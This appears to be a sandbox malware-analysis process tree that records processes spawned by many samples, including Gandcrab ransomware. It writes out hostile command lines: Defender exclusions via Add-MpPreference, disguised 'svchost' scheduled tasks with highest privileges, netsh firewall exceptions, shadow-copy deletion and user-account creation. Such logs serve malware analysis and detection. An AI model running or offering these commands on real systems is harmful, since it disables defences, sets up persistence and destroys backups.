        Command and Scripting Interpreter: PowerShell
        
        PID:3584
    - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "powershell" -Command Add-MpPreference -ExclusionPath 'C:\Windows\it-IT\System.exe'
        5⤵
        Command and Scripting Interpreter: PowerShell
        
        PID:5504
    - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "powershell" -Command Add-MpPreference -ExclusionPath 'C:\Program Files\Mozilla Firefox\gmp-clearkey\0.1\WmiPrvSE.exe'
        5⤵
        Command and Scripting Interpreter: PowerShell
        
        PID:5956
    - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "powershell" -Command Add-MpPreference -ExclusionPath 'C:\Program Files (x86)\Microsoft.NET\RedistList\firefox.exe'
        5⤵
        Command and Scripting Interpreter: PowerShell
        
        PID:6480
    - - C:\Windows\System32\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /C "C:\Users\Admin\AppData\Local\Temp\cDkTflSB0n.bat"
        5⤵
        
        PID:6436
  - - C:\Program Files (x86)\BTZ.exe
      "C:\Program Files (x86)\BTZ.exe"
      4⤵
      PID:5640
  - - C:\Program Files (x86)\Cat.exe
      "C:\Program Files (x86)\Cat.exe"
      4⤵
      PID:5840
  - - C:\Program Files (x86)\Client.exe
      "C:\Program Files (x86)\Client.exe"
      4⤵
      PID:5924
    - - C:\Windows\SYSTEM32\CMD.exe
        
        "CMD" /C SchTaSKs /CrEAte /F /sc OnLoGoN /rl HighEst /tn "svchost" /tr "C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Templates\Sub\Client.exe" & exit
        5⤵
        
        PID:8008
      - C:\Windows\system32\schtasks.exe
        
        SchTaSKs /CrEAte /F /sc OnLoGoN /rl HighEst /tn "svchost" /tr "C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Templates\Sub\Client.exe"
        6⤵
        
        PID:7024
    - - C:\Windows\SYSTEM32\CMD.exe
        
        "CMD" /c SchTaSKs /create /f /sc minute /mo 5 /tn "svchost" /tr "C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Templates\Sub\Client.exe" /RL HIGHEST & exit
        5⤵
        
        PID:7856
      - C:\Windows\system32\schtasks.exe
        
        SchTaSKs /create /f /sc minute /mo 5 /tn "svchost" /tr "C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Templates\Sub\Client.exe" /RL HIGHEST
        6⤵
        Scheduled Task/Job: Scheduled Task
        
        PID:6480
    - - C:\Windows\SYSTEM32\CMD.exe
        
        "CMD" /c SchTaSKs /create /f /sc minute /mo 5 /tn "svchost" /tr "C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Templates\Sub\WatchDog.exe" /RL HIGHEST & exit
        5⤵
        
        PID:2964
      - C:\Windows\system32\schtasks.exe
        
        SchTaSKs /create /f /sc minute /mo 5 /tn "svchost" /tr "C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Templates\Sub\WatchDog.exe" /RL HIGHEST
        6⤵
        
        PID:7496
    - - C:\Windows\SYSTEM32\CMD.exe
        
        "CMD" /c SchTaSKs /create /f /sc minute /mo 5 /tn "svchost" /tr "C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Templates\Sub\Client.exe" /RL HIGHEST & exit
        5⤵
        
        PID:1176
      - C:\Windows\system32\schtasks.exe
        
        SchTaSKs /create /f /sc minute /mo 5 /tn "svchost" /tr "C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Templates\Sub\Client.exe" /RL HIGHEST
        6⤵
        Scheduled Task/Job: Scheduled Task
        
        PID:6104
    - - C:\Windows\SYSTEM32\CMD.exe
        
        "CMD" /c SchTaSKs /create /f /sc minute /mo 5 /tn "svchost" /tr "C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Templates\Sub\WatchDog.exe" /RL HIGHEST & exit
        5⤵
        
        PID:964
      - C:\Windows\system32\schtasks.exe
        
        SchTaSKs /create /f /sc minute /mo 5 /tn "svchost" /tr "C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Templates\Sub\WatchDog.exe" /RL HIGHEST
        6⤵
        Scheduled Task/Job: Scheduled Task
        
        PID:7516
  - - C:\Program Files (x86)\Darkest Dungeon setub.exe
      "C:\Program Files (x86)\Darkest Dungeon setub.exe"
      4⤵
      PID:6000
    - - C:\Users\Admin\AppData\Roaming\svhost.exe
        
        "C:\Users\Admin\AppData\Roaming\svhost.exe"
        5⤵
        
        PID:6148
      - C:\Windows\SysWOW64\netsh.exe
        
        netsh firewall add allowedprogram "C:\Users\Admin\AppData\Roaming\svhost.exe" "svhost.exe" ENABLE
        6⤵
        Modifies Windows Firewall
        
        PID:7544
  - - C:\Program Files (x86)\evil.exe
      "C:\Program Files (x86)\evil.exe"
      4⤵
      PID:6104
    - - C:\Users\Admin\AppData\Local\Temp\evil.exe
        
        "C:\Users\Admin\AppData\Local\Temp\evil.exe"
        5⤵
        
        PID:5552
      - C:\Windows\SysWOW64\netsh.exe
        
        netsh firewall add allowedprogram "C:\Users\Admin\AppData\Local\Temp\evil.exe" "evil.exe" ENABLE
        6⤵
        Modifies Windows Firewall
        
        PID:7792
  - - C:\Program Files (x86)\fwclt.exe
      "C:\Program Files (x86)\fwclt.exe"
      4⤵
      PID:5440
  - - C:\Program Files (x86)\Gandcrab5.0.3.exe
      "C:\Program Files (x86)\Gandcrab5.0.3.exe"
      4⤵
      PID:5128
    - - C:\Windows\SysWOW64\wermgr.exe
        
        "C:\Windows\System32\wermgr.exe"
        5⤵
        
        PID:7056
      - C:\Windows\SysWOW64\wbem\wmic.exe
        
        "C:\Windows\system32\wbem\wmic.exe" shadowcopy delete
        6⤵
        
        PID:7908
  - - C:\Program Files (x86)\Happy18.exe
      "C:\Program Files (x86)\Happy18.exe"
      4⤵
      PID:5796
  - - C:\Program Files (x86)\kosomk.exe
      "C:\Program Files (x86)\kosomk.exe"
      4⤵
      PID:5952
    - - C:\Users\Admin\AppData\Roaming\dicsord.exe
        
        "C:\Users\Admin\AppData\Roaming\dicsord.exe"
        5⤵
        
        PID:6600
      - C:\Windows\SysWOW64\netsh.exe
        
        netsh firewall add allowedprogram "C:\Users\Admin\AppData\Roaming\dicsord.exe" "dicsord.exe" ENABLE
        6⤵
        Modifies Windows Firewall
        
        PID:1088
  - - C:\Program Files (x86)\LightNeuronX0.exe
      "C:\Program Files (x86)\LightNeuronX0.exe"
      4⤵
      PID:4224
  - - C:\Program Files (x86)\malecus.exe
      "C:\Program Files (x86)\malecus.exe"
      4⤵
      PID:5332
  - - C:\Program Files (x86)\see7.exe
      "C:\Program Files (x86)\see7.exe"
      4⤵
      PID:5540
    - - C:\Program Files (x86)\see7.exe
        
        "C:\Program Files (x86)\see7.exe"
        5⤵
        
        PID:6652
    - - C:\Program Files (x86)\see7.exe
        
        "C:\Program Files (x86)\see7.exe"
        5⤵
        
        PID:1748
    - - C:\Program Files (x86)\see7.exe
        
        "C:\Program Files (x86)\see7.exe"
        5⤵
        
        PID:7560
      - C:\Windows\SysWOW64\ipconfig.exe
        
        "C:\Windows\SysWOW64\ipconfig.exe"
        6⤵
        Gathers network information
        
        PID:7516
  - - C:\Program Files (x86)\TEST.exe
      "C:\Program Files (x86)\TEST.exe"
      4⤵
      PID:5712
    - - C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\tmpA73E.tmp.bat""
        5⤵
        
        PID:7248
      - C:\Windows\system32\timeout.exe
        
        timeout 3
        6⤵
        Delays execution with timeout.exe
        
        PID:8020
      - C:\Users\Admin\AppData\Roaming\DriverrHub\Microsoft To Do.exe
        
        "C:\Users\Admin\AppData\Roaming\DriverrHub\Microsoft To Do.exe"
        6⤵
        
        PID:6088
  - - C:\Windows\SysWOW64\cmd.exe
      C:\Windows\system32\cmd.exe /c ""C:\Program Files (x86)\touhou virus.bat" "
      4⤵
      PID:6068
    - - C:\Windows\SysWOW64\net.exe
        
        net user Shanghai /add
        5⤵
        
        PID:7672
      - C:\Windows\SysWOW64\net1.exe
        
        C:\Windows\system32\net1 user Shanghai /add
        6⤵
        
        PID:6820
    - - C:\Windows\SysWOW64\net.exe
        
        net user Bad Apple /add
        5⤵
        
        PID:7532
      - C:\Windows\SysWOW64\net1.exe
        
        C:\Windows\system32\net1 user Bad Apple /add
        6⤵
        
        PID:5704
    - - C:\Windows\SysWOW64\net.exe
        
        net user Marisa
        5⤵
        
        PID:7416
      - C:\Windows\SysWOW64\net1.exe
        
        C:\Windows\system32\net1 user Marisa
        6⤵
        
        PID:6620
    - - C:\Windows\SysWOW64\net.exe
        
        net user Reimu /add
        5⤵
        
        PID:8128
    - - C:\Windows\SysWOW64\mountvol.exe
        
        mountvol X:\ /d
        5⤵
        
        PID:5812
    - - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument https://www.youtube.com/watch?v=PTt19B5_V3I
        5⤵
        
        PID:6788
      - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.131 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.67 --initial-client-data=0x11c,0x120,0x124,0xf8,0x128,0x7ffcbf8746f8,0x7ffcbf874708,0x7ffcbf874718
        6⤵
        
        PID:8184
    - - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument https://www.youtube.com/watch?v=tpedaZ0_yyQ
        5⤵
        
        PID:7756
      - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.131 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.67 --initial-client-data=0x11c,0x120,0x124,0xf8,0x128,0x7ffcbf8746f8,0x7ffcbf874708,0x7ffcbf874718
        6⤵
        
        PID:5896
    - - C:\Windows\SysWOW64\diskpart.exe
        
        diskpart
        5⤵
        
        PID:5760
    - - C:\Windows\SysWOW64\explorer.exe
        
        explorer
        5⤵
        
        PID:5596
    - - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument https://www.youtube.com/watch?v=ZaFd5xdunKI
        5⤵
        
        PID:2368
      - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.131 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.67 --initial-client-data=0x124,0x128,0x12c,0x100,0x130,0x7ffcbf8746f8,0x7ffcbf874708,0x7ffcbf874718
        6⤵
        
        PID:6872
    - - C:\Windows\SysWOW64\cmd.exe
        
        cmd.exe
        5⤵
        
        PID:2936
  - - C:\Program Files (x86)\vbc.exe
      "C:\Program Files (x86)\vbc.exe"
      4⤵
      PID:5888
    - - C:\Users\Admin\AppData\Local\Temp\cbgsujmwws.exe
        
        C:\Users\Admin\AppData\Local\Temp\cbgsujmwws.exe C:\Users\Admin\AppData\Local\Temp\jplmbcuny
        5⤵
        
        PID:6184
      - C:\Users\Admin\AppData\Local\Temp\cbgsujmwws.exe
        
        C:\Users\Admin\AppData\Local\Temp\cbgsujmwws.exe C:\Users\Admin\AppData\Local\Temp\jplmbcuny
        6⤵
        
        PID:6340
      - C:\Windows\SysWOW64\WerFault.exe
        
        C:\Windows\SysWOW64\WerFault.exe -u -p 6184 -s 616
        6⤵
        Program crash
        
        PID:7112
  - - C:\Program Files (x86)\virus.jk.exe
      "C:\Program Files (x86)\virus.jk.exe"
      4⤵
      PID:6216
    - - C:\Program Files (x86)\virus.jk.jk.exe
        
        "C:\Program Files (x86)\virus.jk.jk.exe"
        5⤵
        
        PID:7040
      - C:\Program Files (x86)\virus.jk.jk.jk.exe
        
        "C:\Program Files (x86)\virus.jk.jk.jk.exe"
        6⤵
        
        PID:5428
        
        C:\Program Files (x86)\virus.jk.jk.jk.jk.exe
        
        "C:\Program Files (x86)\virus.jk.jk.jk.jk.exe"
        7⤵
        
        PID:6700
        
        C:\Program Files (x86)\virus.jk.jk.jk.jk.jk.exe
        
        "C:\Program Files (x86)\virus.jk.jk.jk.jk.jk.exe"
        8⤵
        
        PID:5148
        
        C:\Program Files (x86)\virus.jk.jk.jk.jk.jk.jk.exe
        
        "C:\Program Files (x86)\virus.jk.jk.jk.jk.jk.jk.exe"
        9⤵
        
        PID:2412
        
        C:\Program Files (x86)\virus.jk.jk.jk.jk.jk.jk.jk.exe
        
        "C:\Program Files (x86)\virus.jk.jk.jk.jk.jk.jk.jk.exe"
        10⤵
        
        PID:7588
        
        C:\Program Files (x86)\virus.jk.jk.jk.jk.jk.jk.jk.jk.exe
        
        "C:\Program Files (x86)\virus.jk.jk.jk.jk.jk.jk.jk.jk.exe"
        11⤵
        
        PID:7444
        
        C:\Program Files (x86)\virus.jk.jk.jk.jk.jk.jk.jk.jk.jk.exe
        
        "C:\Program Files (x86)\virus.jk.jk.jk.jk.jk.jk.jk.jk.jk.exe"
        12⤵
        
        PID:6920
        
        C:\Program Files (x86)\virus.jk.jk.jk.jk.jk.jk.jk.jk.jk.jk.exe
        
        "C:\Program Files (x86)\virus.jk.jk.jk.jk.jk.jk.jk.jk.jk.jk.exe"
        13⤵
        
        PID:7944
        
        C:\Program Files (x86)\virus.jk.jk.jk.jk.jk.jk.jk.jk.jk.jk.jk.exe
        
        "C:\Program Files (x86)\virus.jk.jk.jk.jk.jk.jk.jk.jk.jk.jk.jk.exe"
        14⤵
        
        PID:5808
        
        C:\Program Files (x86)\virus.jk.jk.jk.jk.jk.jk.jk.jk.jk.jk.jk.jk.exe
        
        "C:\Program Files (x86)\virus.jk.jk.jk.jk.jk.jk.jk.jk.jk.jk.jk.jk.exe"
        15⤵
        
        PID:5696
        
        C:\Program Files (x86)\virus.jk.jk.jk.jk.jk.jk.jk.jk.jk.jk.jk.jk.jk.exe
        
        "C:\Program Files (x86)\virus.jk.jk.jk.jk.jk.jk.jk.jk.jk.jk.jk.jk.jk.exe"
        16⤵
        
        PID:2476
        
        C:\Program Files (x86)\virus.jk.jk.jk.jk.jk.jk.jk.jk.jk.jk.jk.jk.jk.jk.exe
        
        "C:\Program Files (x86)\virus.jk.jk.jk.jk.jk.jk.jk.jk.jk.jk.jk.jk.jk.jk.exe"
        17⤵
        
        PID:5232
        
        C:\Program Files (x86)\virus.jk.jk.jk.jk.jk.jk.jk.jk.jk.jk.jk.jk.jk.jk.jk.exe
        
        "C:\Program Files (x86)\virus.jk.jk.jk.jk.jk.jk.jk.jk.jk.jk.jk.jk.jk.jk.jk.exe"
        18⤵
        
        PID:7852
        
        C:\Program Files (x86)\virus.jk.jk.jk.jk.jk.jk.jk.jk.jk.jk.jk.jk.jk.jk.jk.jk.exe
        
        "C:\Program Files (x86)\virus.jk.jk.jk.jk.jk.jk.jk.jk.jk.jk.jk.jk.jk.jk.jk.jk.exe"
        19⤵
        
        PID:6888
        
        C:\Program Files (x86)\virus.jk.jk.jk.jk.jk.jk.jk.jk.jk.jk.jk.jk.jk.jk.jk.jk.jk.exe
        
        "C:\Program Files (x86)\virus.jk.jk.jk.jk.jk.jk.jk.jk.jk.jk.jk.jk.jk.jk.jk.jk.jk.exe"
        20⤵
        
        PID:5740

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "firefoxf" /sc MINUTE /mo 9 /tr "'C:\Recovery\WindowsRE\firefox.exe'" /f
1⤵
PID:5504

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "firefox" /sc ONLOGON /tr "'C:\Recovery\WindowsRE\firefox.exe'" /rl HIGHEST /f
1⤵
PID:5624

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "firefoxf" /sc MINUTE /mo 5 /tr "'C:\Recovery\WindowsRE\firefox.exe'" /rl HIGHEST /f
1⤵
- Scheduled Task/Job: Scheduled Task
PID:5780

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "RuntimeBrokerR" /sc MINUTE /mo 11 /tr "'C:\Recovery\WindowsRE\RuntimeBroker.exe'" /f
1⤵
- Scheduled Task/Job: Scheduled Task
PID:5808

C:\Windows\helppane.exe
C:\Windows\helppane.exe -Embedding
1⤵
PID:5816
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument microsoft-edge:https://go.microsoft.com/fwlink/?LinkId=528881
  2⤵
  PID:5672
- - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
    "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.131 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.67 --initial-client-data=0xfc,0x100,0x104,0xd8,0x108,0x7ffcbf8746f8,0x7ffcbf874708,0x7ffcbf874718
    3⤵
    PID:6348
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument microsoft-edge:https://go.microsoft.com/fwlink/?LinkId=528881
  2⤵
  PID:6632
- - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
    "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.131 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.67 --initial-client-data=0xfc,0x100,0x104,0xd8,0x108,0x7ffcbf8746f8,0x7ffcbf874708,0x7ffcbf874718
    3⤵
    PID:6780
- - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
    "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=2260,14473834656401048475,16542827782002580892,131072 --gpu-preferences=UAAAAAAAAADgAAAQAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=2272 /prefetch:2
    3⤵
    PID:5124
- - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
    "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=2260,14473834656401048475,16542827782002580892,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2320 /prefetch:3
    3⤵
    PID:5508
- - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
    "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --field-trial-handle=2260,14473834656401048475,16542827782002580892,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=2764 /prefetch:8
    3⤵
    PID:6352
- - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
    "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2260,14473834656401048475,16542827782002580892,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3224 /prefetch:1
    3⤵
    PID:6872
- - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
    "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2260,14473834656401048475,16542827782002580892,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3232 /prefetch:1
    3⤵
    PID:6552
- - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
    "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2260,14473834656401048475,16542827782002580892,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=7 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4804 /prefetch:1
    3⤵
    PID:8184
- - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
    "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2260,14473834656401048475,16542827782002580892,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=8 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4816 /prefetch:1
    3⤵
    PID:6788
- - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
    "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2260,14473834656401048475,16542827782002580892,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=9 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4716 /prefetch:1
    3⤵
    PID:7744
- - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
    "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2260,14473834656401048475,16542827782002580892,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=10 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5388 /prefetch:1
    3⤵
    PID:7840
- - C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe
    "C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --field-trial-handle=2260,14473834656401048475,16542827782002580892,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=1672 /prefetch:8
    3⤵
    PID:7396
- - C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe
    "C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --field-trial-handle=2260,14473834656401048475,16542827782002580892,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=1672 /prefetch:8
    3⤵
    PID:6484
- - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
    "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=2260,14473834656401048475,16542827782002580892,131072 --gpu-preferences=UAAAAAAAAADgAAAQAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=2772 /prefetch:2
    3⤵
    PID:7652
- - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
    "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=2260,14473834656401048475,16542827782002580892,131072 --gpu-preferences=UAAAAAAAAADgAAAQAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=4808 /prefetch:2
    3⤵
    PID:6588
- - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
    "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2260,14473834656401048475,16542827782002580892,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=14 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=2316 /prefetch:1
    3⤵
    PID:5772
- - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
    "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2260,14473834656401048475,16542827782002580892,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=15 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5060 /prefetch:1
    3⤵
    PID:924
- - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
    "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2260,14473834656401048475,16542827782002580892,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=16 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4720 /prefetch:1
    3⤵
    PID:7908
- - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
    "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=2260,14473834656401048475,16542827782002580892,131072 --gpu-preferences=UAAAAAAAAADgAAAQAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --use-gl=swiftshader-webgl --mojo-platform-channel-handle=2768 /prefetch:2
    3⤵
    PID:7248
- - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
    "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2260,14473834656401048475,16542827782002580892,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=18 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6040 /prefetch:1
    3⤵
    PID:7308
- - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
